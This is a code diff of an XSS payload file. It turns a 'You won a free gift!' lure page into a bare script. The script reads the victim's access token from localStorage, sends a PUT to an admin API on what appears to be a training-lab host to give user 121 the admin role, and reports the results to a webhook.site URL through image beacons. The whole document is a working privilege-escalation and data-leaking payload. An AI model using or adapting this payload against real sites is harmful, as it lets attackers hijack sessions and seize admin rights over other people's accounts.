--- a/xss_paylof.html
+++ b/xss_paylof.html
@@ -1,43 +1,28 @@
-<!DOCTYPE html>
-<html>
-<head>
-  <title>Free Gift</title>
-</head>
-<body>
-  <h1>You won a free gift!</h1>
+<script>
+  const token = localStorage.getItem('access_token');
 
-  <script>
-    const token = localStorage.getItem('access_token');
+  const img = new Image();
+  img.src = 'https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?step=1_start';
 
-    if (token) {
-      fetch('https://cybershortlink-dc105f08.exam.cyberjutsu-lab.tech/api/admin/users/121', {
-        method: 'PUT',
-        headers: {
-          'Authorization': 'Bearer ' + token,
-          'Content-Type': 'application/json',
-          'Accept': 'application/json'
-        },
-        body: JSON.stringify({
-          name: 'Victim',
-          email: 'victim@example.com',
-          role: 'admin'
-        })
-      })
-      .then(response => {
-        // Gửi thông báo bằng ảnh
-        const img = new Image();
-        img.src = 'https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?status=' + response.status + '&ok=' + response.ok;
-      })
-      .catch(error => {
-        // Gửi lỗi bằng ảnh
-        const img = new Image();
-        img.src = 'https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?error=' + encodeURIComponent(error.toString());
-      });
-    } else {
-      // Token không có, báo lỗi về webhook
-      const img = new Image();
-      img.src = 'https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?error=NoToken';
-    }
-  </script>
-</body>
-</html>
+  fetch('https://cybershortlink-dc105f08.exam.cyberjutsu-lab.tech/api/admin/users/121', {
+    method: 'PUT',
+    headers: {
+      'Authorization': 'Bearer ' + token,
+      'Content-Type': 'application/json',
+      'Accept': 'application/json'
+    },
+    body: JSON.stringify({
+      name: 'Test User',
+      email: 'test@example.com',
+      role: 'admin'
+    })
+  })
+  .then(r => {
+    const successImg = new Image();
+    successImg.src = 'https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?step=2_response_ok=' + r.ok + '&status=' + r.status;
+  })
+  .catch(e => {
+    const errorImg = new Image();
+    errorImg.src = 'https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?step=3_error=' + encodeURIComponent(e.toString());
+  });
+</script>
